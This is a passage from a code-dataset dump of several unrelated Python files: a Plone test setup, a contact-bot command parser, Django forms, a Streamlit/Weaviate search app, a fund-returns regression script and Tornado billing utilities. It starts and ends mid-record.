)\n","repo_name":"ZIZUN/pytorch_lightning_template","sub_path":"util/model/Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6552596071","text":"from hexagonit.testing.browser import Browser\nfrom plone.app.testing import SITE_OWNER_NAME\nfrom plone.app.testing import SITE_OWNER_PASSWORD\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import TEST_USER_NAME\nfrom plone.app.testing import TEST_USER_PASSWORD\nfrom plone.app.testing import setRoles\nfrom plone.testing import layered\nfrom sll.templates.tests.base import FUNCTIONAL_TESTING\nfrom sll.templates.browser.interfaces import ITopPageFeed\nfrom zope.testing import renormalizing\nfrom zope.interface import alsoProvides\n\n\nimport doctest\nimport manuel.codeblock\nimport manuel.doctest\nimport manuel.testing\nimport re\nimport transaction\nimport unittest\n\nFLAGS = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS | doctest.REPORT_NDIFF | doctest.REPORT_ONLY_FIRST_FAILURE\n\nCHECKER = renormalizing.RENormalizing([\n # Normalize the generated UUID values to always compare equal.\n (re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'), '<UUID>'),\n])\n\n\ndef setUp(self):\n layer = self.globs['layer']\n # Update global variables within the tests.\n self.globs.update({\n 'portal': layer['portal'],\n 'portal_url': layer['portal'].absolute_url(),\n 'browser': Browser(layer['app']),\n 'TEST_USER_ID': TEST_USER_ID,\n 'TEST_USER_NAME': TEST_USER_NAME,\n 'TEST_USER_PASSWORD': TEST_USER_PASSWORD,\n 'SITE_OWNER_NAME': SITE_OWNER_NAME,\n 'SITE_OWNER_PASSWORD': SITE_OWNER_PASSWORD,\n })\n\n portal = self.globs['portal']\n browser = self.globs['browser']\n portal_url = self.globs['portal_url']\n 
browser.setBaseUrl(portal_url)\n\n    browser.handleErrors = True\n    portal.error_log._ignored_exceptions = ()\n\n    setRoles(portal, TEST_USER_ID, ['Manager'])\n\n    folder = portal[\n        portal.invokeFactory(\n            'Folder',\n            'folder',\n            title='Title of Folder',\n            description='Description of Folder.',\n        )\n    ]\n    folder.reindexObject()\n\n    ids = ['01', '02']\n    for oid in ids:\n        obj = folder[\n            folder.invokeFactory(\n                'Document',\n                'doc{0}'.format(oid),\n                title='Title of Document{0}'.format(oid),\n                description='Description of Document{0}'.format(oid),\n                text='<p>This is the body text of Document{0}.</p>'.format(oid),\n            )\n        ]\n        alsoProvides(obj, ITopPageFeed)\n        obj.setEffectiveDate(obj.modified())\n        obj.reindexObject()\n    doc03 = folder[folder.invokeFactory(\n        'Document', 'doc03', title='Title of Document03', description='Description of Document03',\n        text='<p>This is the body text of Document03.</p>')]\n    doc03.setEffectiveDate(doc03.modified())\n    doc03.reindexObject()\n\n    transaction.commit()\n\n\ndef DocFileSuite(testfile, flags=FLAGS, setUp=setUp, layer=FUNCTIONAL_TESTING):\n    \"\"\"Returns a test suite configured with a test layer.\n\n    :param testfile: Path to a doctest file.\n    :type testfile: str\n\n    :param flags: Doctest test flags.\n    :type flags: int\n\n    :param setUp: Test set up function.\n    :type setUp: callable\n\n    :param layer: Test layer\n    :type layer: object\n\n    :rtype: `manuel.testing.TestSuite`\n    \"\"\"\n    m = manuel.doctest.Manuel(optionflags=flags, checker=CHECKER)\n    m += manuel.codeblock.Manuel()\n\n    return layered(\n        manuel.testing.TestSuite(m, testfile, setUp=setUp, globs=dict(layer=layer)),\n        layer=layer)\n\n\ndef test_suite():\n    return unittest.TestSuite([\n        DocFileSuite('functional/folder.txt'),\n        DocFileSuite('functional/portal.txt')])\n","repo_name":"taito-zz/sll.templates","sub_path":"src/sll/templates/tests/test_folder.py","file_name":"test_folder.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8779294742","text":"from bot import Bot\nfrom bot import *\nfrom AddressBook import *\nfrom rich.console import Console\nfrom classes import *\nfrom note_tag import *\nimport difflib\n\n# for package install\nVERSION = \"0.9.0\"\n\nCOMMANDS = {\n    add_command: (\"add\", \"+\", \"2\",\"adding\",\"append\"),\n    change_command: (\"change\", \"зміни\", \"3\"),\n    exit_command: (\"bye\", \"exit\", \"end\",\"GoodBye\", \"0\"),\n    delete_contact_command:(\"del\",\"8\", \"delete\"),\n    find_command: (\"find\", \"4\"),\n    show_all_command: (\"show-all\", \"5\", \"show\",\"showing\"),\n    hello_command:(\"hello\", \"1\"),\n    edit_name_command: (\"edit\", \"7\",\"rename\"),\n    change_birthday_command: (\"change-bday\", \"6\",\"change-birthday\", \"changebday\",\"changebirthday\"),\n    change_email_command: (\"change-email\", \"9\", \"change-mail\", \"changemail\", \"changeemail\"),\n    change_address_command: (\"change-address\", \"10\",\"changeaddress\"),\n    sort_files: (\"sort\",\"sorting\"),\n    contacts_in_period: (\"period\", \"bdays\",\"congrats\"),\n    help_command: (\"help\",),\n    show_notes: (\"show-notes\", \"n5\"),\n    make_note: (\"make-notes\", \"add-notes\", \"+n\"),\n    bot_add_teg: (\"add-tag\",\"+t\"),\n    bot_change_teg: (\"change-tag\",\"=t\"),\n    bot_add_text_note: (\"add-text\",),\n    bot_change_text_note: (\"change-text\",\"=text\"),\n    delete_note_by_number: (\"delete-note\",\"-n\"),\n    search_notes: (\"search-n\",\"search-notes\",\"search-tag\",\"fnt\")\n    \n}\n\ndef get_closest_matches(user_input, 
commands, n=3, cutoff=0.6):\n    user_input_lower = user_input.lower()\n    closest_matches = []\n    for cmd, kwds in commands.items():\n        for kwd in kwds:\n            if kwd in user_input_lower:\n                closest_matches.append(kwd)\n    if not closest_matches:\n        user_words = user_input_lower.split()\n        for cmd, kwds in commands.items():\n            for kwd in kwds:\n                for word in user_words:\n                    similarity = difflib.SequenceMatcher(None, word, kwd).ratio()\n                    if similarity >= 0.5: # Similarity threshold; can be tuned to your needs\n                        closest_matches.append(kwd)\n                        break\n    return closest_matches\n\ndef parser(text: str):\n    text_lst = text.split(\" \")\n    for cmd, kwds in COMMANDS.items():\n        kwd = text_lst[0]\n        if len(text_lst) and kwd in kwds:\n            data = text[len(kwd):].strip().split()\n            return cmd, data\n\n    matches = get_closest_matches(text, COMMANDS)\n    if matches:\n        return closest_matches_suggestion, (matches,)\n\n    return unknown_command, [text]\n    \n    # for kwd in kwds:\n    #     if text.lower().startswith(kwd):\n    #         data = text[len(kwd):].strip().split()\n    #         if cmd in [change_command, edit_name_command]:\n    #             if len(data) < 3:\n    #                 data.append(None)\n    #         return cmd, data\n\n\ndef closest_matches_suggestion(matches):\n    return f\"Did you mean one of the following commands: {', '.join(matches)}?\"\n\ndef unknown_command(text):\n    return f\"Unknown command: '{text}'. Type 'help' to see the list of available commands.\"\n\ndef main():\n    print('Hello. I am your contact-assistant.\\nWhat can I do for you?')\n    \n    while True:\n        user_input = input(\"enter your choices--->>> \")\n\n        cmd, data = parser(user_input)\n\n        if cmd == exit_command:\n            print(\"Goodbye!\")\n            break\n\n        result = cmd(*data) # Process the command and get the result\n\n        if cmd == closest_matches_suggestion:\n            print(result) # Print the message with suggested commands\n        elif cmd == unknown_command:\n            print(result) # Print the unknown-command message\n        else:\n            if isinstance(result, str):\n                print(result)\n            else:\n                console = Console()\n                console.print(result)\n\n    \n    \n\nif __name__ == \"__main__\":\n    bot = Bot()\n    main()\n","repo_name":"AlexanderBgit/PyCore15_Team7","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28118904419","text":"# magick convert *.png simsph.gif\nimport os\nimport sys\nimport numpy as np\nimport glob\n\n\noutpath = 'processed1_test'\nif (os.path.exists(outpath) == False):\n    os.mkdir(outpath)\n\npath = 'sph_sim_output'\nfiles = sorted(glob.glob(path + \"/*\"))\n\nfor i,f in enumerate(files):\n    print (f)\n    df = np.loadtxt(f) \n\n    floats = df.astype(float)\n    np.save(outpath + '/outputFloat-%02d.npy' % i, floats)\n\n    print(\"running\" + str(i))\n","repo_name":"BCarcasi/Fluid-Engine","sub_path":"Fluid Engine/ConvertToFloat.py","file_name":"ConvertToFloat.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3869563230","text":"from django import forms\nfrom .models import PdfUpload\n\nclass PdfUploadForm(forms.ModelForm):\n    \"\"\"PDF upload form\"\"\"\n\n    class Meta:\n        model = PdfUpload\n        fields = ('upload',)\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        for field in self.fields.values():\n            field.widget.attrs[\"class\"] = \"form-control\"\n\nfrom datetime import date, datetime\n\nclass QueryDateForm(forms.Form):\n    \"\"\"Date search form\"\"\"\n    date = forms.DateField(\n        
label='日付',\n        widget=forms.SelectDateWidget(\n            attrs={'class': 'form-select'},\n            years=range(datetime.today().year, datetime.today().year - 9, -1)\n        )\n    )\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\nclass QueryDatePeriodForm(forms.Form):\n    \"\"\"Date-range search form\"\"\"\n    error_css_class = 'error'\n\n    start_period = forms.DateField(\n        label='開始日',\n        widget=forms.SelectDateWidget(\n            attrs={'class': 'form-select'},\n            years=range(datetime.today().year, datetime.today().year - 9, -1)\n        )\n    )\n    end_period = forms.DateField(\n        label='終了日',\n        widget=forms.SelectDateWidget(\n            attrs={'class': 'form-select'},\n            years=range(datetime.today().year, datetime.today().year - 9, -1)\n        )\n    )\n\n    def clean(self):\n        cleaned_data = super().clean()\n        start_period = cleaned_data.get('start_period')\n        end_period = cleaned_data.get('end_period')\n\n        if start_period and end_period:\n            if start_period > end_period:\n                raise ValidationError(_('開始日は完了日よりも前の日付に設定して下さい。'))","repo_name":"akifumi-maeda/django-pdf-uploader","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11061603658","text":"import io\nimport os\nimport streamlit as st\nimport weaviate\nfrom PIL import Image\nimport base64\n\n# Connect to Weaviate\nweaviate_client = weaviate.Client(url=\"http://localhost:8080\")\n\ndef set_bg(image_file):\n    with open(image_file, \"rb\") as image_file:\n        encoded_string = base64.b64encode(image_file.read())\n    st.markdown(\n        f\"\"\"\n        <style>\n        .stApp {{\n            background-image: url(data:image/{\"webp\"};base64,{encoded_string.decode()});\n            background-size: cover\n        }}\n        </style>\n        \"\"\",\n        unsafe_allow_html=True\n    )\n\n# Helper function to convert a file to base64 representation\ndef toBase64(path):\n    with open(path, 'rb') as file:\n        return base64.b64encode(file.read()).decode('utf-8')\n    \ndef text_to_media(query):\n    # Search for media with the given query\n    response = weaviate_client.query.get(\"Craigslist\", \"name path desc url mediaType\").with_near_text({\"concepts\": query}).with_limit(10).with_additional('distance').do()\n    result = response[\"data\"][\"Get\"][\"Craigslist\"]\n    final_results = []\n\n    for r in result:\n        print(f\"{r['_additional']['distance']},{r['desc']}\")\n        if r['_additional']['distance'] <= 0.75:\n            final_results.append(r)\n\n    return final_results\n\ndef image_search(image_path):\n    # Search for images that are similar to the provided image of test-meerkat, test-dog, test-cat\n    response = weaviate_client.query.get(\"Craigslist\", \"name path desc url mediaType\").with_near_image({\"image\": image_path}).with_limit(10).with_additional('distance').do()\n    result = response[\"data\"][\"Get\"][\"Craigslist\"]\n    final_results = []\n\n    for r in result:\n        print(f\"{r['_additional']['distance']}\")\n        if r['_additional']['distance'] <= 0.75:\n            final_results.append(r)\n\n    return final_results\n\ndef main():\n    st.title(\"Nextgen Craigslist Powered by GAI\")\n\n    # Set background image\n    set_bg('bg.webp')\n\n    # Image Upload\n    st.subheader(\"Upload an Image:\")\n    uploaded_image = st.file_uploader(\"Choose an image...\", type=[\"jpg\", \"png\", \"jpeg\"])\n\n    query = st.text_input(\"Or enter a text query:\")\n\n    if st.button(\"Search\"):\n        if uploaded_image:\n            path = os.path.join('.', uploaded_image.name)\n            # image = toBase64(path)\n            # image = Image.open(uploaded_image)\n            # image_bytes = io.BytesIO()\n            # 
image.save(image_bytes, format=\"JPEG\")\n            # image_data = image_bytes.getvalue()\n\n            # Perform image-based search\n            # You need to implement this part using your specific Weaviate capabilities\n            # Here, I assume that you have a separate function for image-based search\n            # Replace the 'image_search' function with your own implementation\n            # print(type(image), image)\n            results = image_search(path)\n        elif query:\n            results = text_to_media(query)\n        else:\n            results = []\n            st.markdown(\"Please upload an image or enter a text query.\")\n\n        if results:\n            st.markdown(f\"Found {len(results)} results:\")\n            for result in results:\n                st.image(result[\"path\"])\n                st.write(result[\"name\"])\n                st.write(result[\"desc\"])\n        else:\n            st.markdown(\"No results found.\")\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"nataliepan/ClassiAi","sub_path":"nextgen-craigslist.py","file_name":"nextgen-craigslist.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16487099691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 09:23:26 2022\n\n@author: gojja and willi\n\"\"\"\n\n#%% Packages\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets, linear_model, metrics\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n#%% Loading data (individual fund)\n\ny_p = pd.read_csv(r\".../Data/Clean/passive_returns_m_df.csv\", index_col=0)\ny_p = y_p.iloc[:,0:3].dropna()\n\ny_a = pd.read_csv(r\".../Data/Clean/active_returns_m_df.csv\", index_col=0)\n\n#x = pd.read_csv(r\".../Data/Clean/x_mon_df.csv\")\nx = pd.read_csv(r\".../Data/Clean/x_df_2.csv\")\n#x.drop('USREC', inplace=True, axis=1)\n\n#%% Creating X and y (individual fund)\n\ndf = pd.merge(y_p,x, on=['year', 'month'], how = \"inner\")\ndf = df.assign(day = 1)\ndf.index = pd.to_datetime(df[['year', 'month', 'day']])\ndf.drop(['year', 'month', 'day'], inplace=True, axis=1)\n\ny = df.iloc[:,0]\nX = df.iloc[:,1:]\n\n#%% Splitting data (individual fund)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)\n\n\n#%% Linear regression (individual fund)\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X_train, y_train)\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test, y_test)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train), model.predict(X_train) - y_train,\n            color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test), model.predict(X_test) - y_test,\n            color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# =============================================================================\n#%% Aggregate y\n# =============================================================================\n\n#Loading data (agg_y)\ndf = pd.read_csv(r\".../Data/Clean/X_time_fix_mon.csv\")\n\n#%% Creating X and y (agg_y)\nX = df.iloc[:,1:]\ny = df.iloc[:,0]\n\n#%% Splitting data (agg_y)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)\n\n#%% Linear regression 
(agg_y)\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X_train, y_train)\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test, y_test)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train), model.predict(X_train) - y_train,\n            color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test), model.predict(X_test) - y_test,\n            color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# =============================================================================\n#%% Regular in loop\n# =============================================================================\n\n# Loading data\n\ny_p = pd.read_csv(r\".../Data/Clean/passive_returns_m_df.csv\", index_col=0)\ny_a = pd.read_csv(r\".../Data/Clean/active_returns_m_df.csv\", index_col=0)\n\nx = pd.read_csv(r\".../Data/Clean/x_df_2.csv\")\n\n#df = df.assign(day = 1)\n#df.index = pd.to_datetime(df[['year', 'month', 'day']])\n#df.drop(['year', 'month', 'day'], inplace=True, axis=1)\n\ndef num_obs(df):\n    obs = np.zeros(shape = (df.shape[1]-2,1))\n    for i in range (df.shape[1]-2):\n        obs[i] = df.value_counts(subset=df.columns[i+2]).shape[0]\n    return(obs)\n\nn_obs_p = pd.DataFrame(num_obs(y_p))\nn_obs_p.index = y_p.columns[2:]\n\nn_obs_a = pd.DataFrame(num_obs(y_a))\nn_obs_a.index = y_a.columns[2:]\n\nn_obs_few_p = n_obs_p[n_obs_p>=24].dropna()\nn_obs_few_a = n_obs_a[n_obs_a>=24].dropna()\n\nsel_p = n_obs_few_p.index\nsel_a = n_obs_few_a.index\n\ny_2_p = y_p[sel_p]\ny_2_p.insert(0,'month',y_p['month'])\ny_2_p.insert(0,'year',y_p['year'])\n\ny_2_a = y_a[sel_a]\ny_2_a.insert(0,'month',y_a['month'])\ny_2_a.insert(0,'year',y_a['year'])\n\ny_2 = y_2_p # assumption: use the passive funds here (y_2 was left undefined in the original)\ndf = pd.merge(y_2,x, on=['year', 'month'], how = \"inner\")\n\ndef lin_reg(df,y):\n    r2 = np.zeros(shape =(y.shape[1]-2,1))\n    for i in range(y.shape[1]-2):\n        df_temp = df.dropna(axis = 0, how = 'any', subset=df.columns[i+2])\n        y_temp = df_temp.iloc[:,i+2]\n        X_temp = df_temp.iloc[:,y_2.shape[1]:]\n        X_temp.insert(0,'const',1) # Read that adding a constant would help, but did not improve the r2\n        X_train, X_test, y_train, y_test = train_test_split(X_temp, y_temp, test_size=0.3,\n                                                            random_state=1)\n        model = linear_model.LinearRegression()\n        model.fit(X_train, y_train)\n        r2[i] = model.score(X_test, y_test)\n    return (r2)\n\nr2_test = lin_reg(df,y_2)\nr2_test = pd.DataFrame(r2_test)\nr2_test_2 = r2_test[r2_test>=-2000].dropna()\nr2_test_3 = r2_test[r2_test>=-1000].dropna()\nr2_test_3_avg = r2_test_3.mean()\nr2_test_2_avg = r2_test_2.mean()\nr2_test_avg = r2_test.mean()\n\nsum(r2_test)\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test, y_test)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train), model.predict(X_train) - y_train,\n            color = \"green\", s = 10, label = 'Train 
data')\nplt.scatter(model.predict(X_test), model.predict(X_test) - y_test,\n            color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# =============================================================================\n#%% loading data (long format)\n# =============================================================================\n\ndf_long_p = pd.read_csv(r\".../Data/Clean/df_m_long_p.csv\")\ndf_long_a = pd.read_csv(r\".../Data/Clean/df_m_long_a.csv\")\n\nX_p = df_long_p.iloc[:,4:]\ny_p = df_long_p.iloc[:,1]\n\nX_a = df_long_a.iloc[:,4:]\ny_a = df_long_a.iloc[:,1]\n\n#%% Splitting data (long format)\n\nX_train_long, X_test_long, y_train_long, y_test_long = train_test_split(X_p, \n                                                                        y_p, \n                                                                        test_size=0.3, \n                                                                        random_state=1)\n\n#%% Linear regression (long df format)\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X_train_long, y_train_long)\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test_long, y_test_long)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train_long), model.predict(X_train_long) - y_train_long,\n            color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test_long), model.predict(X_test_long) - y_test_long,\n            color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions_long = model.predict(X_test_long)\ny_bar_long = y_test_long.mean()\n\non_long = sum((y_test_long-y_bar_long)**2)/y_test_long.shape[0]\nvn_long = sum((y_test_long-predictions_long)**2)/y_test_long.shape[0]\nsn_long = on_long - vn_long\nr2_long = sn_long/on_long\n\n# Notes for future research:\n# Try the aggregate version\n# Try the dis-aggregated version while not allowing low numbers of obs.\n# Try the panel-data version with the correct data format. 
(normalization?, growth rates) ","repo_name":"williantleite/DML_in_Finance","sub_path":"Dev/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9610679528","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport IPy\nimport json\nimport time\nimport copy\nimport when\nimport arrow\nimport random\nimport logging\nimport openpyxl\n\nfrom openpyxl.styles import Alignment\nfrom tornado import web, gen, httpclient\nfrom tornado.httputil import url_concat\nfrom settings import COMMON_URL, STATE, BILL_PAY_STATE, PAY_TYPE, PAY_MD, ORDER_STATE\n\n\nhttpclient.AsyncHTTPClient.configure('tornado.simple_httpclient.SimpleAsyncHTTPClient', max_clients=300)\n\n\nclass APIError(web.HTTPError):\n    '''\n    Custom API exception\n    '''\n    def __init__(self, status_code=200, *args, **kwargs):\n        super(APIError, self).__init__(status_code, *args, **kwargs)\n        self.kwargs = kwargs\n\ndef dict_filter(target, attr=()):\n    result = dict()\n    for p in attr:\n        if type(p) is dict:\n            key = list(p.keys())[0]\n            value = list(p.values())[0]\n            result[value] = target[key] if key in target else ''\n        elif p in target:\n            result[p] = target[p]\n    return result\n\ndef toNone(va):\n    # empty to none\n    return None if not va else va\n\ndef http_request(url, method='GET', **wargs):\n    return httpclient.HTTPRequest(url=url, method=method, connect_timeout=10, request_timeout=10, **wargs)\n\ndef get_async_client():\n    http_client = httpclient.AsyncHTTPClient()\n    return http_client\n\nasync def fetch(http_client, request):\n    r = await http_client.fetch(request)\n    logging.info('\\treq_url=%s\\trequest_time=%s' % (r.effective_url, r.request_time))\n    return r\n\nasync def async_common_api(path, params={}):\n    url = url_concat(COMMON_URL + path, params)\n    http_client = get_async_client()\n    try:\n        request = http_request(url)\n        response = await fetch(http_client, request)\n        response = json.loads(response.body.decode())\n        return response\n    except Exception as e:\n        logging.error('url=%s, error=%s' % (url, e))\n        raise APIError(errcode=10001, errmsg='公共接口请求失败')\n\ndef common_api(path, params={}):\n    url = url_concat(COMMON_URL + path, params)\n    http_client = httpclient.HTTPClient()\n    try:\n        request = http_request(url)\n        response = http_client.fetch(request)\n        response = json.loads(response.body.decode())\n        return response\n    except Exception as e:\n        logging.error('url=%s, error=%s' % (url, e))\n        raise APIError(errcode=10001, errmsg='公共接口请求失败')\n    finally:\n        http_client.close()\n\ndef common_post_api(path, params={}, method='POST'):\n    url = COMMON_URL + path\n    http_client = httpclient.HTTPClient()\n    try:\n        request = http_request(url, method=method, body=json.dumps(params))\n        response = http_client.fetch(request)\n        response = json.loads(response.body.decode())\n        return response\n    except Exception as e:\n        logging.error('url=%s, error=%s' % (url, e))\n        raise APIError(errcode=10001, errmsg='公共接口请求失败')\n    finally:\n        http_client.close()\n\ndef seconds_to_midnight():\n    now = time.localtime()\n    drawn = time.mktime(now[:3] + (0, 0, 0) + now[6:])\n    return int(drawn + 86400 - time.time())\n\ndef is_valid_date(date_str):\n    if not date_str:\n        return True\n    try:\n        time.strptime(date_str, '%Y-%m-%d')\n        return True\n    except:\n        return False\n\ndef is_valid_time(time_str):\n    if not time_str:\n        return True\n    try:\n        time.strptime(time_str, '%H:%M')\n        return True\n    except:\n        return False\n\ndef is_valid_day_value(day_str):\n    if not 
day_str:\n        return True\n    try:\n        days = day_str.split(',')\n        for day in days:\n            if int(day) > 7 or int(day) < 1:\n                return False\n    except:\n        return False\n    else:\n        return True\n\ndef is_valid_rt_ids_value(rt_ids_str):\n    if not rt_ids_str:\n        return True\n    try:\n        rt_ids = rt_ids_str.split(',')\n        for rt_id in rt_ids:\n            int(rt_id)\n    except:\n        return False\n    else:\n        return True\n\ndef is_ip_address(address):\n    if not address:\n        return True\n    try:\n        IPy.IP(address)\n        return True\n    except:\n        return False\n\ndef get_day_of_week(day=None):\n    '''\n    Values 1-7, corresponding to Monday through Sunday\n    '''\n    day = day if day else when.today()\n    return day.weekday() + 1\n\ndef is_valid_pack(pack, today=None):\n    today = today if today else when.today()\n    valid_days = [int(day) for day in pack['day'].split(',')]\n    day = get_day_of_week(today)\n\n    if pack['state'] == STATE['valid'] and pack['start_date'] <= today <= pack['end_date'] and day in valid_days:\n        return True\n\n    return False\n\ndef future_time_by_hour(st, hour, format='HH:mm'):\n    st = arrow.get(st, format)\n    ed = st.replace(hours=hour)\n\n    return ed.format(format)\n\ndef future_time_by_minute(st, minute, format='HH:mm'):\n    st = arrow.get(st, format)\n    ed = st.replace(minutes=minute)\n\n    return ed.format(format)\n\ndef minute_distance(time_str_1, time_str_2):\n    return (arrow.get(time_str_2, 'HH:mm') - arrow.get(time_str_1, 'HH:mm')).seconds / 60\n\ndef is_valid_fees(fees, store_st, store_ed):\n    '''\n    Check whether the fee time-slot configuration is valid\n    fees: all fee slots for a given day\n    store_st: store opening time\n    store_ed: store closing time\n    '''\n    cfees = copy.deepcopy(fees)\n    if not cfees:\n        return False\n\n    for f in cfees:\n        if f['st'] < store_st:\n            h, m = f['st'].split(':')\n            f['st'] = '%s:%s'%(24+int(h), m)\n        if f['ed'] <= store_st:\n            h, m = f['ed'].split(':')\n            f['ed'] = '%s:%s'%(24+int(h), m)\n\n    if store_ed <= store_st:\n        h, m = store_ed.split(':')\n        store_ed = '%s:%s'%(24+int(h), m)\n\n    cfees = sorted(cfees, key=lambda f: f['st'])\n\n    start_st = cfees[0]['st']\n    end_ed = cfees[len(cfees) - 1]['ed']\n\n    if start_st != store_st or end_ed != store_ed:\n        return False\n\n    for index, fee in enumerate(cfees[1:]):\n        st = fee['st']\n        last_ed = cfees[index]['ed']\n        if st != last_ed:\n            return False\n\n    return True\n\ndef is_hour_in_range(hour, start, end, tp='st'):\n    # if start == end:\n    #     raise APIError(errcode=50001, errmsg='计费方式设置有误')\n    if start < end:\n        if tp == 'st':\n            if start <= hour < end:\n                return True\n        else:\n            if start < hour <= end:\n                return True\n\n        return False\n\n    if tp == 'st':\n        if start <= hour < '24:00' or '00:00' <= hour < end:\n            return True\n    else:\n        if start < hour < '24:00' or '00:00' <= hour <= end:\n            return True\n\n    return False\n\ndef get_time_bills(fees, st, ed):\n    st = st[-5:]\n    ed = ed[-5:]\n    st_index = -1\n    ed_index = -1\n\n    for index, fee in enumerate(fees):\n        if is_hour_in_range(st, fee['st'], fee['ed']):\n            st_index = index\n        if is_hour_in_range(ed, fee['st'], fee['ed'], 'ed'):\n            ed_index = index\n\n    if st_index == -1 or ed_index == -1:\n        raise APIError(errcode=50001, errmsg='开台时间或关台时间设置有误')\n\n    bills = []\n\n    if st_index == ed_index:\n        fee = fees[st_index]\n\n        fee_id = fee['id']\n        minute = minute_distance(st, ed)\n        money_minute = int(fee['fee'] / 60)\n        money = int(minute * fee['fee'] / 60)\n\n        bills.append({\n            'st': st,\n            'ed': ed,\n            'fee_id': fee_id,\n            'minute': minute,\n            'money_minute': money_minute,\n            'money': money\n        })\n\n    elif ed_index > st_index:\n\n        for index in range(st_index, ed_index + 1):\n            fee = fees[index]\n            fee_id = fee['id']\n\n            if index == st_index:\n                gen_st = st\n                gen_ed = fee['ed']\n            elif index == 
